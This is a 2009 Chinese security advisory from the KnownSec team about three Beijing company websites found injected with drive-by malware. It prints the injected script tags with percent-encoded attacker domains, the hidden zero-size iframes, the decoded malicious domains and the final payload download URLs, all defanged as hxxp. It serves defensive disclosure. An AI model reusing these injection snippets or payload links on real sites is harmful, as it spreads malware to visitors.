2009年2月2日挂马简报

来源:岁月联盟 编辑:zhuzhu 时间:2009-02-03
  知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:北京英展画室、北京道可特律师事务所、北京中创安照明科技发展有限公司、  北京英展画室(hxxp://www.bjyzhs.com.cn/)底部被植入恶 ...  知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:北京英展画室、北京道可特律师事务所、北京中创安照明科技发展有限公司、
  北京英展画室(hxxp://www.bjyzhs.com.cn/)底部被植入恶意代码:
  <script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script>
  恶意链接地址解密后为:
  hxxp://hhj2.cn
  hxxp://hhj3.cn
  hxxp://vvk3.cn
  hxxp://vvk5.cn
  hxxp://hhj7.cn
  hxxp://vvk7.cn
  通过漏洞攻击,最终下载病毒:
  hxxp://d.weixk.com/new/a1.css
  hxxp://d.oixka.com/new/a1.css
  北京道可特律师事务所(hxxp://www.dtlawyers.com.cn/count/mystat.asp)被植入恶意代码:
  <iframe src=hxxp://www.51txx.cn/sea.htm width=0 height=0></iframe><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><iframe src=hxxp://www.51txx.cn/sea.htm width=0 height=0></iframe><script src=hxxp://%68%68%6A%32%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%68%68%6A%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%33%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%76%76%6B%35%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%68%68%6A%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script>
  document.write(”<script>var url=’hxxp://www.dtlawyers.com.cn/count/’;var style=”;</script>”);
  document.write(”<script src=”+url+”/stat.asp?style=”+style+”&referer=”+escape(document.referrer)+”&screenwidth=”+(screen.width)+”></script>”);
  通过漏洞攻击,最终下载病毒:
  hxxp://d.weixk.com/new/a1.css
  hxxp://d.oixka.com/new/a1.css
  北京中创安照明科技发展有限公司(hxxp://www.bjzca.com/)被植入恶意代码:
  <ifRame sRc=hxxp://www.2009dddd.cn/one/a46.htm width=50 height=0 boRdeR=0></ifRame>
  <script language=javascript src=hxxp://%77%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
  <iframe src=hxxp://www.bengchizz.cn/b3.htm width=50 height=0 border=0></iframe>
  <script language=javascript src=hxxp://%6C%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
  通过漏洞攻击,最终下载病毒:
  hxxp://m.wuc8.com/mm.exe
  hxxp://d.weixk.com/new/a1.css
  hxxp://d.oixka.com/new/a1.css
  推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com关键字:挂马简报
上一篇:美国最大招聘网站用户资料遭到黑客窃取
下一篇:俄罗斯人对他国进行DDOS攻击

最近更新

随机推荐